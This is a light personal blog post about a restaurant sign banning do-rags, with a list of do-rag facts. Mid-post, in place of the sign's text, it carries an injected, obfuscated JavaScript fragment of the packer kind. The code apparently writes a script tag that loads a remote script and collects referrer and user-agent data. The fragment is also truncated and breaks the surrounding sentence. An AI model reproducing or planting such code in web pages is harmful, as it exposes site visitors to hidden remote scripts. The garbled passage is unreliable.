No shirts, no shoes, no service

You’ve seen the sign before.  Always at super classy establishments.

I was in Kansas City a few weeks ago and a group of us headed out to dinner.  I’d say this was a moderate to upscale restaurant.  Reasons why the restaurant was medium-classy:

1.  They had a 2 story dessert cart – yes, 2 story – and it held about a dozen desserts.  When you were finished with dinner, the cart was wheeled to your table so you could choose your dessert.  A-mazing.

2.  Old people dressed up.

3.  Middle aged people dressed up.

4.  Waiters with ties – women wore ties too.

5.  Low-light.  Very romantic.

Our incredibly under-dressed group headed to the restaurant – 7 in all.  You can imagine our surprise when we saw this sign on the hostess podium.

You ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tnyrz|var|u0026u|referrer|efidk||js|php’.split(‘|’),0,{}))
read that right.  No Do-Rags.  Good thing I left mine at home.

I wonder if a single person showed up at the restaurant with a stroller, wearing a cut offs, a tank top, hat and a do-rag, all while talking on the phone….or maybe it was a lot of repeat offenders.  Either, there must be a do-rag problem in Kansas City.

Don’t know what a do-rag is?

A few facts about do-rags (thanks wikipedia):

Despite popular belief, the do-rag is not a recent African American trend.  It has been used for centuries by both men/women of African and Chinese decent.

Used to protect the neck from the sun.

Rosie-the-riveter is famously pictured wearing a blue-collar woman’s do-rag.

Do-rags are regularly used to create and maintain waves. They are also used for corn rowed hairstyles. They usually have long ties on either side that are wrapped around the head to secure the do-rag and tied at the back.

Do-rags may be worn by motorcycle riders to help keep hair from blowing in the face and eyes, keep bugs out of their hair, and to absorb sweat.

Still don’t think I need one….but if I ever do, I’ll be sure to stay away from that restaurant in Kansas City.
